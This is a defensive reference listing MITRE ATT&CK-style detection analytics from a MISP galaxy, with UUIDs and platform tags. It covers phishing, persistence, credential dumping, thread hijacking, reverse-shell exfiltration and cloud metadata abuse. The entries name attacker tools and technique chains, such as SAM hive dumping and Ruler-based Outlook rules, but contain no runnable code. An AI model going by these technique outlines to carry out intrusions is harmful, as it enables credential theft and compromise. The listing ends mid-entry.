Consider use of services that may aid in the tracking of newly issued certificates and/or certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017) Some server-side components of adversary tools may have default values set for SSL/TLS certificates.(Citation: Recorded Future Beacon Certificates) Monitor for logged network traffic in response to a scan showing both protocol header and body values that may buy and/or steal SSL/TLS certificates that can be used during targeting. Detection efforts may be focused on related behaviors, such as Web Protocols, Asymmetric Cryptography, and/or Install Root Certificate.

Internal MISP references

UUID babb8a91-12af-4f2d-be59-2df099acc06c which can be used as unique global reference for Analytic 1980 - AN1980 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1980
mitre_platforms ['PRE']

Analytic 0189 - AN0189

Monitor for malicious payload delivery through phishing where attachments or URLs in email clients (e.g., Thunderbird, mutt) result in unusual file creation or outbound network connections. Focus on correlation between mail logs, file writes, and execution activity.

Internal MISP references

UUID c5fe5b29-c56f-4c40-b880-051ec6644600 which can be used as unique global reference for Analytic 0189 - AN0189 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0189
mitre_platforms ['Linux']

Analytic 0918 - AN0918

Detection of EFI/firmware manipulation attempts via abnormal driver loads, unsigned kexts, or tampered NVRAM variables associated with component firmware configuration.

Internal MISP references

UUID c89e4f72-a563-4665-9934-14b9efe88a06 which can be used as unique global reference for Analytic 0918 - AN0918 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0918
mitre_platforms ['macOS']

Analytic 1098 - AN1098

Detect runtime manipulation by monitoring system calls for modifications to shared libraries, ELF binaries, or environment variables that affect how data is displayed. Look for suspicious writes to application directories and mismatch in binary integrity baselines.

Internal MISP references

UUID e2e39b7e-02e4-4e7a-966c-6b05721da8f7 which can be used as unique global reference for Analytic 1098 - AN1098 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1098
mitre_platforms ['Linux']

Analytic 1809 - AN1809

The user can view which applications have permission to use the camera through the device settings screen, where the user can then choose to revoke the permissions. During the vetting process, applications using the Android permission android.permission.CAMERA, or the iOS NSCameraUsageDescription plist entry could be given closer scrutiny.

Internal MISP references

UUID e6c05bf0-e6d6-46f9-ba38-11b58fbf2f26 which can be used as unique global reference for Analytic 1809 - AN1809 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1809
mitre_platforms ['iOS']

Analytic 0199 - AN0199

Detects adversary use of logon script configuration via Group Policy or user object attributes, followed by script execution post-authentication. Behavior includes modification of script path or file, then process execution under user logon context.

Internal MISP references

UUID 6dae9309-90a7-4b4e-b764-9486a7ba4390 which can be used as unique global reference for Analytic 0199 - AN0199 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0199
mitre_platforms ['Windows']

Analytic 0919 - AN0919

Identifies self-modifying executables that exhibit changes in binary hash, entropy, or memory sections during or between executions—often tied to dynamic unpacking or decryption behaviors.

Internal MISP references

UUID 786c54fa-8a9f-41bc-aa22-c4a4f6a93bd7 which can be used as unique global reference for Analytic 0919 - AN0919 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0919
mitre_platforms ['Windows']

Analytic 1099 - AN1099

Monitor for runtime manipulation by observing changes in application bundles, unexpected signing modifications, and runtime API calls that inject or alter how data is displayed. Detect alterations in CFNetwork or CoreFoundation frameworks responsible for rendering data.

Internal MISP references

UUID a9c30b9d-6810-47d3-8bf5-ca787836e7ef which can be used as unique global reference for Analytic 1099 - AN1099 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1099
mitre_platforms ['macOS']

Analytic 1990 - AN1990

Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.

Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.

Internal MISP references

UUID db6010df-737d-4fa1-89af-dce6c4c3c305 which can be used as unique global reference for Analytic 1990 - AN1990 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1990
mitre_platforms ['PRE']

Analytic 0991 - AN0991

Detects VMs sending outbound traffic through non-standard services or to unknown destinations. Exfiltration over reverse shells tunneled via VMkernel or custom payloads routed via hostd/vpxa.

Internal MISP references

UUID f8998263-e55f-428f-b8d0-46d9e31277d2 which can be used as unique global reference for Analytic 0991 - AN0991 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0991
mitre_platforms ['ESXi']

Analytic 2022 - AN2022

Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.

Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.

Internal MISP references

UUID 7726e542-666b-4eeb-8998-cddb45a41605 which can be used as unique global reference for Analytic 2022 - AN2022 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN2022
mitre_platforms ['PRE']

Analytic 0222 - AN0222

Adversary exploits containerized app via ingress or service. Chain: (1) suspicious request in ingress/app logs → (2) container process spawns a shell/exec/sidecar (kubectl exec/docker exec) → (3) egress to Internet or metadata service (169.254.169.254).

Internal MISP references

UUID a57ad75c-331e-4607-b358-61f4cddb8a5d which can be used as unique global reference for Analytic 0222 - AN0222 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0222
mitre_platforms ['Containers']

Analytic 0223 - AN0223

Adversary targets cloud-hosted public endpoints. Chain: (1) ALB/ELB/Cloud LB logs show exploit-like inputs or error spikes → (2) workload spawns shell or reaches metadata API → (3) egress to new external hosts.

Internal MISP references

UUID 17f9487f-711d-4f28-9de8-209ae39d33d2 which can be used as unique global reference for Analytic 0223 - AN0223 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0223
mitre_platforms ['IaaS']

Analytic 0322 - AN0322

Phishing attempts via iCloud Mail, Gmail, or social media apps accessed on macOS systems. Defender view includes Mail.app or Safari downloads of files followed by osascript, Terminal, or abnormal child process execution.

Internal MISP references

UUID 262ce2a7-2c09-4f6d-8e9f-de57b814a2a2 which can be used as unique global reference for Analytic 0322 - AN0322 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0322
mitre_platforms ['macOS']

Analytic 2032 - AN2032

Observation of scripted network requests (e.g., using osascript, curl, or python) that include mismatched or spoofed browser User-Agent strings compared to the typical macOS Safari or Chrome baseline, especially when triggered by non-interactive launch agents, login hooks, or background daemons.

Internal MISP references

UUID 29ca0e06-e848-44cd-821a-24576276a8af which can be used as unique global reference for Analytic 2032 - AN2032 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN2032
mitre_platforms ['macOS']

Analytic 2023 - AN2023

Monitor for queried domain name system (DNS) registry data that may compromise third-party DNS servers that can be used during targeting. Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control. Monitor for logged domain name system (DNS) registry data that may compromise third-party DNS servers that can be used during targeting. Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.

Internal MISP references

UUID 9eb9a81f-cf55-48f8-a8da-217a7684aff4 which can be used as unique global reference for Analytic 2023 - AN2023 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN2023
mitre_platforms ['PRE']

Analytic 0232 - AN0232

Adversary modifies ESXi host login banner or MOTD file (/etc/motd), either through SSH or host console access. May involve configuration file overwrite or API calls from compromised vSphere clients.

Internal MISP references

UUID c024ed9a-02bf-436d-93f5-444e45124e2f which can be used as unique global reference for Analytic 0232 - AN0232 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0232
mitre_platforms ['ESXi']

Analytic 0224 - AN0224

Adversary exploits exposed OpenSLP on ESXi or vCenter public endpoints. Chain: inbound request pattern to mgmt service → hostd/vpxd error/crash/restart → unexpected process behavior or datastore access → outbound callback.

Internal MISP references

UUID 0668f39a-d319-427f-b29b-160399e6f79a which can be used as unique global reference for Analytic 0224 - AN0224 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0224
mitre_platforms ['ESXi']

Analytic 2024 - AN2024

Monitor logged domain name system (DNS) data for purchased domains that can be used during targeting. Reputation/category-based detection may be difficult until the categorization is updated. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access and Command and Control. Domain registration information is, by design, captured in public registration logs. Consider use of services that may aid in tracking of newly acquired domains, such as WHOIS databases and/or passive DNS. In some cases it may be possible to pivot on known pieces of domain registration information to uncover other infrastructure purchased by the adversary. Consider monitoring for domains created with a similar structure to your own, including under a different TLD. Though various tools and services exist to track, query, and monitor domain name registration information, tracking across multiple DNS infrastructures can require multiple tools/services or more advanced analytics.(Citation: ThreatConnect Infrastructure Dec 2020) Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access and Command and Control. Monitor queried domain name system (DNS) registry data for purchased domains that can be used during targeting. Reputation/category-based detection may be difficult until the categorization is updated. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access and Command and Control.

Internal MISP references

UUID 68a7b414-9864-46c6-b629-bec6f07b5c31 which can be used as unique global reference for Analytic 2024 - AN2024 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN2024
mitre_platforms ['PRE']

Analytic 0422 - AN0422

Forged SAML tokens may be leveraged to access O365 apps such as Outlook or SharePoint. Defenders should monitor for token replay across multiple clients or access attempts to privileged mailboxes without prior interactive login.

Internal MISP references

UUID 8359e4ed-c4a1-4734-a3dd-e2d3eb33bc90 which can be used as unique global reference for Analytic 0422 - AN0422 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0422
mitre_platforms ['Office Suite']

Analytic 0242 - AN0242

Defender detects execution of mdfind, launchctl, or GUI-based enumeration (e.g., /Applications/Time Machine.app) along with command-line usage of find, grep, or system_profiler to identify installed backup tools like Time Machine, Carbon Copy Cloner, or Backblaze. Often triggered from Terminal sessions or within post-exploitation scripts.

Internal MISP references

UUID e3c81570-be1b-48c8-b000-b70173c5c226 which can be used as unique global reference for Analytic 0242 - AN0242 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0242
mitre_platforms ['macOS']

Analytic 0522 - AN0522

Detects clearing of unified logs, deletion of plist files tied to persistence, and manipulation of Terminal history after initial execution.

Internal MISP references

UUID 2f0f5c7a-18ee-462e-b364-b1d8df3b2c02 which can be used as unique global reference for Analytic 0522 - AN0522 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0522
mitre_platforms ['macOS']

Analytic 0225 - AN0225

Adversary exploits public admin services on routers/firewalls/switches. Chain: anomalous HTTP/SNMP/SmartInstall inputs → device syslog errors/restarts → config changes/CLI spawn → egress to attacker C2.

Internal MISP references

UUID 72298803-0644-477f-be89-01b173202577 which can be used as unique global reference for Analytic 0225 - AN0225 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0225
mitre_platforms ['Network Devices']

Analytic 2025 - AN2025

If infrastructure or patterns in malicious web content have been previously identified, internet scanning may uncover when an adversary has staged web content to make it accessible for targeting. Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on other phases of the adversary lifecycle, such as during Spearphishing Link , Spearphishing Link , or Malicious Link .

Internal MISP references

UUID 91f5dbce-d334-4b42-9554-e94866d75a26 which can be used as unique global reference for Analytic 2025 - AN2025 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN2025
mitre_platforms ['PRE']

Analytic 0252 - AN0252

Installation of configuration profiles or plist entries associated with malicious or unauthorized browser extensions

Internal MISP references

UUID d8f9ab20-4c82-42fc-9316-91781fa9e5e1 which can be used as unique global reference for Analytic 0252 - AN0252 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0252
mitre_platforms ['macOS']

Analytic 2026 - AN2026

Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on behaviors relating to the use of exploits (i.e. Exploit Public-Facing Application, Exploitation for Client Execution, Exploitation for Privilege Escalation, Exploitation for Defense Evasion, Exploitation for Credential Access, Exploitation of Remote Services, and Application or System Exploitation).

Internal MISP references

UUID 1762aa55-010b-4a26-b439-7afcfcc5613d which can be used as unique global reference for Analytic 2026 - AN2026 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN2026
mitre_platforms ['PRE']

Analytic 0226 - AN0226

Execution of trusted, Microsoft-signed binaries such as rundll32.exe, msiexec.exe, or regsvr32.exe used to execute externally hosted, unsigned, or suspicious payloads through command-line parameters or network retrieval.

Internal MISP references

UUID 865c00d7-fc01-4ce6-8fc8-d7a84f2ded36 which can be used as unique global reference for Analytic 0226 - AN0226 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0226
mitre_platforms ['Windows']

Analytic 0262 - AN0262

Detects modification of ESXi cron jobs, local.sh scripts, or scheduled API calls to persist custom binaries or shell scripts.

Internal MISP references

UUID e5adcc7e-5d68-4080-bb87-e901f297485d which can be used as unique global reference for Analytic 0262 - AN0262 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0262
mitre_platforms ['ESXi']

Analytic 0622 - AN0622

Abuse of mmc.exe to execute non-Microsoft or user-staged .msc files and malicious COM CLSIDs. Behavioral chain: (1) suspicious mmc.exe invocation with /a or -Embedding and non-standard .msc path → (2) COM activation of non-baseline CLSIDs by mmc.exe → (3) mmc.exe loads non-baseline DLLs (user-writable/UNC/unsigned) → (4) optional network/DNS activity from mmc.exe.

Internal MISP references

UUID e6f38f76-4e60-4b8a-881c-5d3f206e912c which can be used as unique global reference for Analytic 0622 - AN0622 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0622
mitre_platforms ['Windows']

Analytic 0227 - AN0227

Execution of trusted system binaries (e.g., split, tee, bash, env) used in uncommon sequences or chained behaviors to execute malicious payloads or perform actions inconsistent with normal system or script behavior.

Internal MISP references

UUID 273d7b27-6b7d-4017-a7f6-0cd02fd3a128 which can be used as unique global reference for Analytic 0227 - AN0227 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0227
mitre_platforms ['Linux']

Analytic 0272 - AN0272

Scripted or binary usage of X11 utilities (e.g., xdotool, wmctrl) or direct /proc/*/window mappings to discover open GUI windows and active desktops.

Internal MISP references

UUID 557d1a5d-31ae-4600-b4ed-a456d9964a83 which can be used as unique global reference for Analytic 0272 - AN0272 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0272
mitre_platforms ['Linux']

Analytic 0722 - AN0722

SaaS platforms may show forged credentials as unusual API keys, tokens, or session cookies being used without corresponding authentication. Correlated patterns include simultaneous valid sessions from multiple geographies, unusual API calls with new tokens, or bypass of expected MFA enforcement.

Internal MISP references

UUID 75d43d9f-7b54-4cd4-a6d9-523f8f9a60ff which can be used as unique global reference for Analytic 0722 - AN0722 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0722
mitre_platforms ['SaaS']

Analytic 2027 - AN2027

Monitor for contextual data about an Internet-facing resource gathered from a scan, such as running services or ports that may buy, lease, or rent infrastructure that can be used during targeting. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control. Once adversaries have provisioned infrastructure (ex: a server for use in command and control), internet scans may help proactively discover adversary acquired infrastructure. Consider looking for identifiable patterns such as services listening, certificates in use, SSL/TLS negotiation features, or other response artifacts associated with adversary C2 software.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: Mandiant SCANdalous Jul 2020)(Citation: Koczwara Beacon Hunting Sep 2021) Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control. Monitor for queried domain name system (DNS) registry data that may buy, lease, or rent infrastructure that can be used during targeting. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control. Monitor for logged domain name system (DNS) data that may buy, lease, or rent infrastructure that can be used during targeting. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control. Consider use of services that may aid in tracking of newly acquired infrastructure, such as WHOIS databases for domain registration information. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.

Internal MISP references

UUID 96e1107e-7fbe-49a2-b425-9d85a6ff46df which can be used as unique global reference for Analytic 2027 - AN2027 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN2027
mitre_platforms ['PRE']

Analytic 0822 - AN0822

Detects hijacking of an existing thread (OpenThread) through a behavioral chain involving thread suspension (SuspendThread), memory modification (VirtualAllocEx + WriteProcessMemory), context manipulation (SetThreadContext), and thread resumption—all within another live process's address space (ResumeThread).

Internal MISP references

UUID 26ef9aef-33eb-4df2-ba82-6ace95173c80 which can be used as unique global reference for Analytic 0822 - AN0822 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0822
mitre_platforms ['Windows']

Analytic 0228 - AN0228

Use of system binaries such as osascript, bash, or curl to download or execute unsigned code or files in conjunction with application proxying.

Internal MISP references

UUID 3e461dab-922c-48cc-aafc-51f20025bf27 which can be used as unique global reference for Analytic 0228 - AN0228 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0228
mitre_platforms ['macOS']

Analytic 0282 - AN0282

Monitors for abnormal process behavior and API calls like SetWindowsHookEx, GetAsyncKeyState, or device input polling commonly used for keystroke logging.

Internal MISP references

UUID dd283114-84d8-4b1a-a765-f3a7f378c2d1 which can be used as unique global reference for Analytic 0282 - AN0282 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0282
mitre_platforms ['Windows']

Analytic 2028 - AN2028

Once adversaries leverage the web service as infrastructure (ex: for command and control), it may be possible to look for unique characteristics associated with adversary software, if known.(Citation: ThreatConnect Infrastructure Dec 2020) Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control (Web Service) or Exfiltration Over Web Service.

Internal MISP references

UUID e6500f0c-41bd-4e04-ad9d-4a3121803175 which can be used as unique global reference for Analytic 2028 - AN2028 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN2028
mitre_platforms ['PRE']

Analytic 0229 - AN0229

Adversary modifies internal UI messages (e.g., login banners, desktop wallpapers) or hosted intranet web pages by creating or altering content files using scripts or unauthorized access. Often preceded by privilege escalation or web shell deployment.

Internal MISP references

UUID 78c505c6-25a1-4cc5-b44a-0574aa019f01 which can be used as unique global reference for Analytic 0229 - AN0229 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0229
mitre_platforms ['Windows']

Analytic 0922 - AN0922

Unusual process (e.g., rundll32, mshta, wscript, or custom payloads) initiates network connection to external IPs/domains that proxy C2 traffic, often over uncommon ports or high entropy HTTP/S connections.

Internal MISP references

UUID 99b2296f-dc1c-4b0e-a05a-883a0dbb1535 which can be used as unique global reference for Analytic 0922 - AN0922 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0922
mitre_platforms ['Windows']

Analytic 2029 - AN2029

Process execution without GUI context (e.g., powershell.exe, wscript.exe) generates HTTP traffic with a spoofed User-Agent mimicking a legitimate browser. No corresponding UI application (e.g., msedge.exe) is active or in parent lineage. The User-Agent deviates from known enterprise baselines or contains spoofed platform indicators. User-Agent strings can be gathered with API calls such as ShellExecuteW to open the default browser on a socket to receive an HTTP reply, or by hard coding the User-Agent string for a specific browser.

Internal MISP references

UUID b73489af-2e95-4f41-b82e-327a84da2a1d which can be used as unique global reference for Analytic 2029 - AN2029 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN2029
mitre_platforms ['Windows']

Analytic 0292 - AN0292

Use of hash-cracking tools (e.g., John the Ripper, Hashcat) after credential dumping, combined with high CPU usage or GPU invocation via unsigned binaries accessing password hash files

Internal MISP references

UUID d2a45051-b999-4969-aeb0-d7f83d453976 which can be used as unique global reference for Analytic 0292 - AN0292 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0292
mitre_platforms ['Windows']

Analytic 0323 - AN0323

Abuse of safe mode via BCD modification, boot configuration utilities (bcdedit.exe, bootcfg.exe), and registry persistence under SafeBoot keys. Defender view: suspicious boot configuration changes correlated with registry edits that enable adversary persistence or disable defenses.

Internal MISP references

UUID d7a82fc6-047b-47a8-8b3c-d6dcab00d56b which can be used as unique global reference for Analytic 0323 - AN0323 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0323
mitre_platforms ['Windows']

Analytic 0233 - AN0233

Execution of container orchestration commands (e.g., docker exec, kubectl exec) or API-driven interactions with running containers from unauthorized hosts or non-standard user contexts. Defender sees programmatic or interactive command execution within containers outside expected CI/CD tools or automation frameworks, often followed by file writes, privilege escalation, or lateral discovery.

Internal MISP references

UUID e4dd4100-2387-4029-a478-35aefd37c288 which can be used as unique global reference for Analytic 0233 - AN0233 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0233
mitre_platforms ['Containers']

Analytic 0332 - AN0332

Detects access to media files followed by execution of scripts (bash, Python, etc.) referencing those same files, or outbound traffic triggered shortly after file read. Correlates unusual use of tools like steghide, exiftool, or image libraries.

Internal MISP references

UUID f884a712-ace6-426c-ab81-8ff33e83be92 which can be used as unique global reference for Analytic 0332 - AN0332 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0332
mitre_platforms ['Linux']

Analytic 0342 - AN0342

Detects removable drive insertion followed by unusual file access, compression, or staging activity by unauthorized users or unexpected processes.

Internal MISP references

UUID 198d4196-25f0-4e28-a95b-c89709f452ab which can be used as unique global reference for Analytic 0342 - AN0342 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0342
mitre_platforms ['Windows']

Analytic 0432 - AN0432

Process/script execution of systemsetup -gettimezone, date, ioreg, or API usage (timeIntervalSinceNow, gettimeofday) followed by time-based scheduling (launchd plist modification) or sleep-based execution.

Internal MISP references

UUID 252e5c07-8ae0-4ef8-9a98-c11b6c6d4d46 which can be used as unique global reference for Analytic 0432 - AN0432 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0432
mitre_platforms ['macOS']

Analytic 0324 - AN0324

Creation or modification of Windows services or scheduled tasks with names or descriptions mimicking legitimate entries, followed by anomalous execution of untrusted binaries or LOLBAS.

Internal MISP references

UUID 51a23f35-4a11-4119-935a-1ffebcda2839 which can be used as unique global reference for Analytic 0324 - AN0324 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0324
mitre_platforms ['Windows']

Analytic 0234 - AN0234

Defenders can detect suspicious cloud instance deletions by correlating events across authentication, instance lifecycle, and account activity. From a defender’s perspective, behaviors of interest include instances deleted shortly after creation, deletions initiated by new or rarely used accounts, deletions following snapshot creation, and deletions originating from anomalous geolocations or access keys. These may indicate adversarial attempts to destroy forensic evidence or evade detection.

Internal MISP references

UUID 602def5b-49e4-4c64-afe6-1476eac13e67 which can be used as unique global reference for Analytic 0234 - AN0234 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0234
mitre_platforms ['IaaS']

Analytic 0243 - AN0243

Monitors suspicious usage of Windows API calls like SetWindowsHookEx, GetKeyState, or polling functions within non-UI service processes, combined with Registry or driver modifications.

Internal MISP references

UUID 7924d1b1-a512-425f-b397-9e9b9887b21b which can be used as unique global reference for Analytic 0243 - AN0243 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0243
mitre_platforms ['Windows']

Analytic 0423 - AN0423

Detects data access or staging events followed by outbound data flows using unencrypted protocols (e.g., FTP, HTTP) initiated by unexpected processes or to rare destinations.

Internal MISP references

UUID d265376d-3cdc-4e95-a8ea-4c4278860218 which can be used as unique global reference for Analytic 0423 - AN0423 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0423
mitre_platforms ['Windows']

Analytic 0253 - AN0253

Manual or script-based installation of extension-like modules into browser config directories or IDE plugin paths, followed by suspicious network activity

Internal MISP references

UUID 560f859b-2174-4655-b927-b274ad0bda3f which can be used as unique global reference for Analytic 0253 - AN0253 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0253
mitre_platforms ['Linux']

Analytic 0325 - AN0325

Creation or modification of systemd service units or cron jobs using deceptive naming and untrusted command paths, often followed by lateral network activity or privilege escalation.

Internal MISP references

UUID 5a9c1860-23ae-455e-bcab-0e0f91af5548 which can be used as unique global reference for Analytic 0325 - AN0325 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0325
mitre_platforms ['Linux']

Analytic 0532 - AN0532

Repeated or automated access to user document directories or clipboard using shell scripts or utilities like xclip/pbpaste. Detectable via auditd syscall logs or osquery file events.

Internal MISP references

UUID 70df3731-9576-4450-bd32-0f52cc8f0ec3 which can be used as unique global reference for Analytic 0532 - AN0532 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0532
mitre_platforms ['Linux']

Analytic 0235 - AN0235

An adversary running with SYSTEM-level privileges executes commands or accesses registry keys to dump the SAM hive or directly reads sensitive local files from the config directory. This behavior often involves sequential access to HKLM\SAM, HKLM\SYSTEM, and creation of .save or .dmp files, enabling offline hash extraction.

Internal MISP references

UUID 8c881d82-21c3-482c-8895-c240360eec8e which can be used as unique global reference for Analytic 0235 - AN0235 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0235
mitre_platforms ['Windows']

Analytic 0523 - AN0523

Monitors tampering with audit logs, volumes, or mounted storage often used for side-channel logging (e.g., /var/log inside containers) post-compromise.

Internal MISP references

UUID b3d533fc-010a-4ee8-b234-80f98e2443a0 which can be used as unique global reference for Analytic 0523 - AN0523 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0523
mitre_platforms ['Containers']

Analytic 0352 - AN0352

Abuse of cloud metadata APIs or CLI to push SSH public keys to authorized_keys of virtual machines.

Internal MISP references

UUID d613771b-087c-43c4-8430-2a0bf6ebb314 which can be used as unique global reference for Analytic 0352 - AN0352 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0352
mitre_platforms ['IaaS']

Analytic 0236 - AN0236

Monitor for creation of WMI EventFilter, EventConsumer, and FilterToConsumerBinding objects through WMI or MOF file execution. Detect command-line execution of mofcomp.exe, usage of Register-WmiEvent via PowerShell, and anomalous child processes of WmiPrvSE.exe that indicate triggered execution. Look for lateral anomalies in process lineage and WMI logging channels.

Internal MISP references

UUID 1a0640f0-e286-405f-9ab3-507c1abb77da which can be used as unique global reference for Analytic 0236 - AN0236 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0236
mitre_platforms ['Windows']

Analytic 0263 - AN0263

Adversary uses a tool like Ruler or MFCMapi to create a malicious Outlook rule that triggers execution upon receipt of a crafted email. On email delivery, Outlook executes the rule, resulting in code execution (e.g., launching mshta.exe or PowerShell). Outlook spawns a non-standard child process, often unsanctioned, without user interaction.

Internal MISP references

UUID 22cba5f6-b3d5-4a1a-9275-ed7db0bd4c7c which can be used as unique global reference for Analytic 0263 - AN0263 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0263
mitre_platforms ['Windows']

Analytic 0632 - AN0632

Detects binaries disguised as media or document types through extension-only masquerading or by modifying the file signature. Observes execution of files whose extension is not typically executable (.jpg, .txt), yet have valid Mach-O headers or execute via Terminal or launch services.

Internal MISP references

UUID 2bce7f8d-90c1-4835-9ce9-832e5e3a37d6 which can be used as unique global reference for Analytic 0632 - AN0632 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0632
mitre_platforms ['macOS']

Analytic 0623 - AN0623

Detects SCCM, Intune, or remote push execution spawning scripts or binaries from SYSTEM context or unusual consoles (e.g., cmtrace.exe launching PowerShell or cmd.exe).

Internal MISP references

UUID 39ec0aa6-935a-44d3-b206-211981dec3bd which can be used as unique global reference for Analytic 0623 - AN0623 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0623
mitre_platforms ['Windows']

Analytic 0362 - AN0362

Modification of plist files to set apple.awt.UIElement or similar flags hiding app icons and windows, and dscl/command-line activity that suppresses visibility. Defender view: correlation of plist modifications with unexpected hidden user applications.

Internal MISP references

UUID 3d9fb03c-fcc9-4f19-9c49-09d8321f28b9 which can be used as unique global reference for Analytic 0362 - AN0362 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0362
mitre_platforms ['macOS']

Analytic 0326 - AN0326

Creation of LaunchAgents or LaunchDaemons with names resembling known system services but executing non-Apple signed code or scripts.

Internal MISP references

UUID 7e3c05c9-5e49-416c-a0c9-eb7631ea5e7e which can be used as unique global reference for Analytic 0326 - AN0326 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0326
mitre_platforms ['macOS']

Analytic 0732 - AN0732

Anomalous or bulk download activity from private or restricted repositories by non-developer or privileged accounts, often preceded by unusual login behavior (e.g., unfamiliar geo, OAuth token use, elevated API rate).

Internal MISP references

